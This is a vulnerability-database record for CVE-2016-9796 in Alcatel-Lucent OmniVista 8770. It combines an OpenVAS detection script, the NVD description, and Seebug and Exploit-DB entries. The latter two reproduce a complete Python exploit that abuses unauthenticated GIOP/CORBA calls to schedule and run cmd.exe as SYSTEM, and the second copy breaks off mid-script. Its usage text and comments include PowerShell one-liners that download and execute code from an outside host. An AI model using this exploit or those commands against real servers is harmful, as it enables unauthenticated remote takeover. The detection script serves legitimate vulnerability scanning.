);\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n## Construct AddjobSet packet\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! 
len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "type": "openvas", "viewCount": 4}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:47:40"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "093f6fa86e4b143448c139412887dda8"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "70cca94720f62109b82fe3d873b630b1"}, {"key": "href", "hash": "cc48873685a1db65f44dc4a65ac3d77f"}, {"key": "modified", "hash": "b709b30efc224af0ca142422dbaffff3"}, {"key": "naslFamily", "hash": "0db377921f4ce762c62526131097968f"}, {"key": "pluginID", "hash": "18f7ae8aaceb897d726f1bf00abd32b1"}, {"key": "published", "hash": "fb634a5017b2a41a91c85626dded43f9"}, {"key": "references", "hash": "9b0c8a560ca98109588056dc2f5375b9"}, {"key": "reporter", "hash": "ea106ff9c2727a6e906e8959871e7c06"}, {"key": "sourceData", "hash": "0622425b32c3b455561de901e639f001"}, {"key": "title", "hash": "35b06cdf6e7f1387d88e10ea205c0816"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "6977374f5569f6b6a574e8e4593169cd8ee7100a01fa223b1b80a16e9c181644", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9796"]}, {"type": "seebug", "idList": ["SSV:92563"]}, {"type": "exploitdb", "idList": ["EDB-ID:40862"]}, {"type": "zdt", "idList": ["1337DAY-ID-26467"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140026"]}], "modified": "2019-05-29T18:35:33"}, "score": {"value": 9.1, "vector": "NONE", "modified": "2019-05-29T18:35:33"}, "vulnersScore": 9.1}, "objectVersion": "1.3", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 12465 2018-11-21 13:24:34Z cfischer $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 12465 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n 
script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! ver = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\nif( ver != \"8770\" ) exit ( 0 );\n\ngiopport = 30024;\n\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! 
soc ) exit( 0 );\n\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 
);\nlen = strlen( res );\nif( ! len ) exit( 0 );\n\ndata = \"\"; # nb: To make openvas-nasl-lint happy...\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );", "naslFamily": "General", "pluginID": "1361412562310107112", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:15:41", "bulletinFamily": "NVD", "description": "Alcatel-Lucent OmniVista 8770 2.0 through 3.0 exposes different ORBs interfaces, which can be queried using the GIOP protocol on TCP port 30024. An attacker can bypass authentication, and OmniVista invokes methods (AddJobSet, AddJob, and ExecuteNow) that can be used to run arbitrary commands on the server, with the privilege of NT AUTHORITY\\SYSTEM on the server. NOTE: The discoverer states \"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue, which means applying proper firewall rules to prevent unauthorised clients to connect to the OmniVista server.\"", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-9796", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9796", "published": "2016-12-03T06:59:00", "title": "CVE-2016-9796", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:38", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92563", "id": "SSV:92563", "type": "seebug", "title": "Alcatel Lucent Omnivista 8770 Remote Code Execution\uff08CVE-2016-9796\uff09", "sourceData": "\n import socket\r\nimport time\r\nimport sys\r\nimport os\r\n \r\n# ref https://blog.malerisch.net/\r\n# Omnivista Alcatel-Lucent running on Windows Server\r\n \r\n \r\nif len(sys.argv) < 2:\r\n print \"Usage: %s <target> <command>\" % sys.argv[0]\r\n print \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0]\r\n sys.exit(1)\r\n \r\ntarget = sys.argv[1]\r\nargument1 = ' '.join(sys.argv[2:])\r\n \r\n# so we need to get the biosname of the target... 
so run this poc exploit script should be run in kali directly...\r\n \r\nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read()\r\nnetbiosname = netbiosname.strip(\"\\n\")\r\n \r\n# dirty functions to do hex magic with bytes...\r\n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte\r\n### needs to calculate for each\r\n### \r\n \r\ndef calcsize(giop):\r\n \r\n s = len(giop.decode('hex'))\r\n h = hex(s) #\"\\x04\" -> \"04\"\r\n return h[2:].zfill(8) # it's 4 bytes for the size\r\n \r\ndef calcstring(param): # 1 byte size calc\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...\r\n \r\ndef calcstring2(param):\r\n \r\n s = (len(param)/2)+1\r\n h = hex(s)\r\n return h[2:].zfill(4)\r\n \r\n \r\n \r\n##\r\n \r\n#GIOP request size is specified at the 11th byte\r\n \r\n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............\r\n# d8 is the size of GIOP REQUEST\r\n \r\n# GIOP HEADER Is 12 bytes -\r\n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte\r\n \r\n \r\n \r\n#phase 1 - add a jobset\r\n \r\ngiopid = 1 # an arbitrary ID can be put there...\r\n \r\n# there are checks in the size of the username.. 
need to find where the size is specified - anyway, 58 bytes seems all right...\r\n \r\nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\"\r\n \r\n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex')))\r\n \r\njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet...\r\n \r\n \r\naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed???\r\n \r\nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\"\r\nprint \"Connecting to target...\"\r\n \r\n \r\n \r\n \r\np = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\np.connect((target, 30024))\r\n \r\n \r\n#p = remote(target, 30024, \"ipv4\", \"tcp\")\r\n \r\nprint \"Adding a job...\"\r\n \r\np.send(addjobset.decode('hex'))\r\n \r\n#p.recv()\r\n \r\ndata = p.recv(1024)\r\n \r\ns = len(data)\r\n \r\n#objectkey = \"\" # last 16 bytes of the response!\r\n \r\nobjectkey = data[s-16:s].encode('hex')\r\n \r\n#print objectkey\r\n \r\n# phase 2 - active jobset\r\n \r\nprint \"Sending active packet against the job\"\r\n \r\nactivegiopid = 2\r\nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\"\r\n \r\n#print active\r\n \r\np.send(active.decode('hex'))\r\n \r\ndata2 = p.recv(1024)\r\n \r\n#print data2\r\n \r\n# phase3 add task\r\n 
\r\naddjobid = 3\r\n \r\nprint \"Adding a task....\"\r\n \r\ntaskname = \"BBBBBBB\".encode('hex')\r\nservername = netbiosname.encode('hex')\r\ncommand = \"C:\\Windows\\System32\\cmd.exe\".encode('hex') #on 32bit\r\n#command = \"C:\\Windows\\SysWOW64\\cmd.exe\".encode('hex') #on 64bit\r\ncommandsize = hex((len(command.decode('hex'))+1))\r\ncommandsize = str(commandsize).replace(\"0x\",\"\")\r\n \r\n#print \"Command size: \"+ str(commandsize)\r\n \r\n#print command.decode('hex')\r\n \r\n#time.sleep(10)\r\n \r\n#powershell = str(command)\r\n#powershell = \"powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');\"\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\n#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');\r\n \r\nargument = str(\"/c \"+argument1).encode('hex')\r\n#argument = str(\"/c notepad.exe\").encode('hex')\r\n \r\n#print len(argument.decode('hex'))\r\n \r\n#argumentsize = len(str(\"/c \"+powershell))+1\r\n \r\n#print \"Argument size: \"+str(argumentsize)\r\n \r\nargumentsize = calcstring2(argument)\r\n \r\n#print \"argument size: \"+str(argumentsize)\r\n \r\n#print argument.decode('hex')\r\n \r\ndef calcpadd(giop):\r\n defaultpadding = \"00000000000001\"\r\n check = giop + defaultpadding + fixedpadding\r\n s = len(check)\r\n #print \"Size: \"+str(s)\r\n if (s/2) % 4 == 0:\r\n #print \"size ok!\"\r\n return check\r\n else:\r\n # fix the default padding\r\n #print \"Size not ok, recalculating padd...\"\r\n dif = (s/2) % 4\r\n #print \"diff: \"+str(dif)\r\n newpadding = defaultpadding[dif*2:]\r\n #print \"Newpadding: \" +str(newpadding)\r\n return giop + newpadding + 
fixedpadding\r\n \r\n \r\n \r\n \r\naddjobhdr = \"47494f5001000000\" # 8 bytes + 4 bytes for message size, including size of the giop request message\r\n \r\nfixedpadding = \"000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000\"\r\n \r\nvariablepadding = \"000000000001\"\r\n \r\n#print calcstring(servername)\r\n#print calcstring(taskname)\r\n \r\n#print \"Command:\" +str(command)\r\n#print \"command size:\"+str(commandsize)\r\n \r\naddjob = \"00000000000000b30100000000000010\" + objectkey + \"000000074164644a6f62000000000000000000\" + calcstring(taskname) + taskname + \"0000000001000000\"+ commandsize + command +\"00000000\" + calcstring(servername) + servername + \"000000\" + argumentsize + argument + \"00\"\r\n \r\n#print addjob\r\n \r\naddjobfin = calcpadd(addjob)\r\n \r\n#print addjobfin.decode('hex')\r\n \r\naddjobsize = calcsize(addjobfin)\r\n \r\n#print \"Lenght of the addjob: \"+str(len(addjobfin.decode('hex')))\r\n \r\n# we need to add the header\r\n \r\nfinalmsg = addjobhdr + addjobsize + addjobfin\r\n \r\n \r\np.send(finalmsg.decode('hex'))\r\n \r\ndata3 = p.recv(1024)\r\n \r\n#print data3\r\n \r\n# phase4 - execute task\r\n \r\nexecuteid = 4\r\n \r\nprint \"Executing task...\"\r\n \r\nexecute = \"47494f50010000000000003500000000000001100100000000000010\" + objectkey + \"0000000b457865637574654e6f7700000000000000\"\r\n \r\np.send(execute.decode('hex'))\r\n \r\ndata4 = p.recv(1024)\r\n \r\nprint \"All packets sent...\"\r\nprint \"Exploit sequence completed, command should have been executed...:-)\"\r\n \r\np.close()\r\n \r\n# optional requests to remove the job after the exploitation\r\n \r\n### in metasploit, we should migrate to another process and then call an \"abort\" function of Omnivista\r\n \r\n##phase5 - abort the job\r\n \r\ncanceljob = \"47494f500100000000000030000000000000008e0100000000000010\" + objectkey + 
\"0000000743616e63656c000000000000\"\r\n \r\n###phase6 - delete the jobset \r\n \r\ndeletejob = \"47494f500100000000000038000000000000009e0100000000000010\" + objectkey + \"0000000d44656c6574654a6f625365740000000000000000\"\r\n\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92563"}], "exploitdb": [{"lastseen": "2016-12-04T21:23:20", "bulletinFamily": "exploit", "description": "Alcatel Lucent Omnivista 8770 - Remote Code Execution. CVE-2016-9796. Remote exploit for Windows platform", "modified": "2016-12-04T00:00:00", "published": "2016-12-04T00:00:00", "id": "EDB-ID:40862", "href": "https://www.exploit-db.com/exploits/40862/", "type": "exploitdb", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution", "sourceData": "import socket\r\nimport time\r\nimport sys\r\nimport os\r\n\r\n# ref https://blog.malerisch.net/\r\n# Omnivista Alcatel-Lucent running on Windows Server\r\n\r\n\r\nif len(sys.argv) < 2:\r\n print \"Usage: %s <target> <command>\" % sys.argv[0]\r\n print \"eg: %s 192.168.1.246 \\\"powershell.exe -nop -w hidden -c \\$g=new-object net.webclient;IEX \\$g.downloadstring('http://192.168.1.40:8080/hello');\\\"\" % sys.argv[0]\r\n sys.exit(1)\r\n\r\ntarget = sys.argv[1]\r\nargument1 = ' '.join(sys.argv[2:])\r\n\r\n# so we need to get the biosname of the target... 
so run this poc exploit script should be run in kali directly...\r\n\r\nnetbiosname = os.popen(\"nbtscan -s : \"+target+\" | cut -d ':' -f2\").read()\r\nnetbiosname = netbiosname.strip(\"\\n\")\r\n\r\n# dirty functions to do hex magic with bytes...\r\n### each variable has size byte before, which includes the string + \"\\x00\" a NULL byte\r\n### needs to calculate for each\r\n### \r\n\r\ndef calcsize(giop):\r\n\r\n\ts = len(giop.decode('hex'))\r\n\th = hex(s) #\"\\x04\" -> \"04\"\r\n\treturn h[2:].zfill(8) # it's 4 bytes for the size\r\n\r\ndef calcstring(param): # 1 byte size calc\r\n\t\r\n\ts = (len(param)/2)+1\r\n\th = hex(s)\r\n\treturn h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...\r\n\r\ndef calcstring2(param):\r\n\r\n\ts = (len(param)/2)+1\r\n\th = hex(s)\r\n\treturn h[2:].zfill(4)\r\n\r\n\r\n\r\n##\r\n\r\n#GIOP request size is specified at the 11th byte\r\n\r\n# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............\r\n# d8 is the size of GIOP REQUEST\r\n\r\n# GIOP HEADER Is 12 bytes -\r\n# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte\r\n\r\n\r\n\r\n#phase 1 - add a jobset\r\n\r\ngiopid = 1 # an arbitrary ID can be put there...\r\n\r\n# there are checks in the size of the username.. 
need to find where the size is specified - anyway, 58 bytes seems all right...\r\n\r\nusernamedata = \"xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc\".encode('hex') # original \"383737302061646d696e697374726174696f6e2c6f3d6e6d63\"\r\n\r\n#print \"Size of usernamedata\" + str(len(usernamedata.decode('hex')))\r\n\r\njobname = \"MYJOB01\".encode('hex') # size of 7 bytes # check also in the captured packet...\r\n\r\n\r\naddjobset = \"47494f50010000000000012600000000\" + \"00000001\" + \"01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008\" + jobname + \"00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d\" + usernamedata + \"00000000000a6f6d6e69766973626200\" # this last part can be changed???\r\n\r\nprint \"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch\"\r\nprint \"Connecting to target...\"\r\n\r\n\r\n\r\n\r\np = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\np.connect((target, 30024))\r\n\r\n\r\n#p = remote(target, 30024, \"ipv4\", \"tcp\")\r\n\r\nprint \"Adding a job...\"\r\n\r\np.send(addjobset.decode('hex'))\r\n\r\n#p.recv()\r\n\r\ndata = p.recv(1024)\r\n\r\ns = len(data)\r\n\r\n#objectkey = \"\" # last 16 bytes of the response!\r\n\r\nobjectkey = data[s-16:s].encode('hex')\r\n\r\n#print objectkey\r\n\r\n# phase 2 - active jobset\r\n\r\nprint \"Sending active packet against the job\"\r\n\r\nactivegiopid = 2\r\nactive = \"47494f50010000000000003100000000\" + \"00000002\" + \"0100000000000010\" + objectkey + \"0000000741637469766500000000000000\"\r\n\r\n#print active\r\n\r\np.send(active.decode('hex'))\r\n\r\ndata2 = p.recv(1024)\r\n\r\n#print data2\r\n\r\n# phase3 add task\r\n\r\naddjobid = 3\r\n\r\nprint 
